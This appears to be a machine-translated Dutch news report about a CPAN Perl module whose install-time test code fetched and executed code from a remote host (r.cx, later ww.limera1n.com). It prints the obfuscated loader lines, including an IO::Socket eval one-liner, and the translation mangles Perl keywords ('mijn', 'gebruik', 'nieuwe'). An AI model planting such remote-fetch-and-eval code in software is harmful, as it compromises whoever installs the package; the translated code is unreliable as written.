In een Perl-pakket dat wordt gedistribueerd via de CPAN-directory , ontworpen om CPAN-modules automatisch te laden, kwaadaardige code. De kwaadaardige invoeging was in de testcode , die sinds 2011 wordt verzonden.
Het is opmerkelijk dat er vragen ontstonden over het laden van twijfelachtige code terug in 2016.
Schadelijke activiteit komt neer op een poging om code te downloaden en uit te voeren van een server van derden (http://r.cx:1/) tijdens de uitvoering van een testpakket dat werd gelanceerd tijdens de installatie van de module. Er wordt aangenomen dat de code die aanvankelijk van de externe server is gedownload niet kwaadaardig was, maar nu wordt het verzoek omgeleid naar het domein ww.limera1n.com, dat zijn deel van de code ter beschikking stelt voor uitvoering.
Om de download in een bestand te ordenen De volgende code wordt gebruikt:
mijn $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mijn $try = `$^X $prog`;
De opgegeven code zorgt ervoor dat het script wordt uitgevoerd , waarvan de inhoud wordt teruggebracht tot de regel:
gebruik lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Dit script wordt geladen gebruik van de dienst code van de externe host r.cx (karaktercodes 82.46.99.88 komen overeen met de tekst "R.cX") en voert deze uit in het eval-blok.
$ perl -MIO::Socket -e'$b=nieuwe IO::Socket::INET 82.46.99.88.":1″; afdrukken <$b>;'
eval uitpakken u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Na het uitpakken wordt uiteindelijk het volgende uitgevoerd: :
print{$b=nieuwe IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalueer return warn$@while$b;1
Het problematische pakket is nu uit de repository verwijderd. (Perl Authors Upload Server) en het account van de module-auteur is geblokkeerd. In dit geval blijft de module bestaan in het MetaCPAN-archief en kan rechtstreeks vanuit MetaCPAN worden geïnstalleerd met behulp van enkele hulpprogramma's zoals cpanminus. dat het pakket niet op grote schaal werd verspreid.
Interessant om te bespreken en de auteur van de module, die de informatie ontkende dat er kwaadaardige code was ingevoegd nadat zijn site “r.cx” was gehackt en uitlegde dat hij gewoon plezier had, en perlobfuscator.com niet gebruikte om iets te verbergen, maar om de grootte te verkleinen van de code en vereenvoudigt het kopiëren ervan via het klembord. De keuze voor de functienaam ‘botstrap’ wordt verklaard door het feit dat dit woord ‘klinkt als bot en korter is dan bootstrap’. De auteur van de module verzekerde ook dat de geïdentificeerde manipulaties geen kwaadaardige acties uitvoeren, maar alleen het laden en uitvoeren van code via TCP demonstreren.
Bron: opennet.ru